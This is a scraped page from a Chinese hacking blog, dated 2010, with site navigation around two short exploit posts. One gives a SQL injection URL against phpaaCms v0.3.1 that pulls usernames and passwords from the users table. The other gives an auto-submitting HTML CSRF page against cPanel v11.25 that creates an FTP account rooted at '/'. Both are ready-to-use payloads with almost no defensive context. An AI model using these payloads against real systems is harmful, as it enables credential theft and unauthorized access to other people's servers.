影子鹰安全网络-主站技术BLOG, 进阶式的学习平台...
 
用户登陆
用户:
密码:
   

站点日历
73 2010 - 7 48
    123
45678910
11121314151617
18192021222324
25262728293031

站点统计
日志:1320 篇
评论:3702 篇
引用:303812 个
会员:1170 人
留言:172 个
访问:18749427 次
今日:18670 平均:7000
建站:2001-10-10
在线人数: ?

最新评论

日志搜索

 标题   内容

友情链接

域名1元加1元送主机

其他信息
影子鹰安全网络-主站技术BLOG
::订阅到抓虾::
订阅到飞鸽
订阅到GOOGLE
订阅到yahoo
订阅到ROJO
RSS 1.0
RSS 2.0
[全部订阅更新]
[鄂ICP备05002492号]
联系我

::影子鹰业务联系专用QQ:;

Gmail:coolkawen(at)Gmail.com站长KAWEN联系方式
QQ群(::Blog交流::)

旗下域名

www.cn9x.com
www.cnyzy.cn


FEED订阅数一览


EMAIL订阅FEED
显示模式: 默认模式 | 树形模式
晴天 phpaaCms v0.3.1 SQL注入漏洞   [ 2010-07-06 07:59:14  |  影子鹰 ]

PHPAA (show.php) 注入漏洞

{注入测试}

http://server/phpaaCMS/show.php?id=-194 union all select 1,2,3,4,5,6,7,8,9,10,concat(username,0x3a,password),12,13,14,15 from cms_users-- 

阅读全文……
作者:kawen | 分类:黑客攻防 | 评论:0 | 引用:0 | 查看:111
晴天 Cpanel v11.25 CSRF 添加管理员账号exp   [ 2010-07-06 07:58:52  |  影子鹰 ]

Cpanel v11.25 CSRF 添加管理员账号漏洞。
Exploite:

<html>     <body onload="javascript:fireForms()">     <form method="POST" name="form0" action="     http://server:2082/frontend/x3/ftp/doaddftp.html">     <input type="hidden" name="login" value="name"/>     <input type="hidden" name="password" value="pass"/>     <input type="hidden" name="password2" value="pass"/>     <input type="hidden" name="homedir" value="/"/>     <input type="hidden" name="quota" value="unlimited"/>     </form>     </body>     </html>   

阅读全文……
作者:kawen | 分类:黑客攻防 | 评论:0 | 引用:0 | 查看:110
  Powered by www.cnyzy.cn Rights © 2006 Processed in 0.189453 second(s) , 5 queries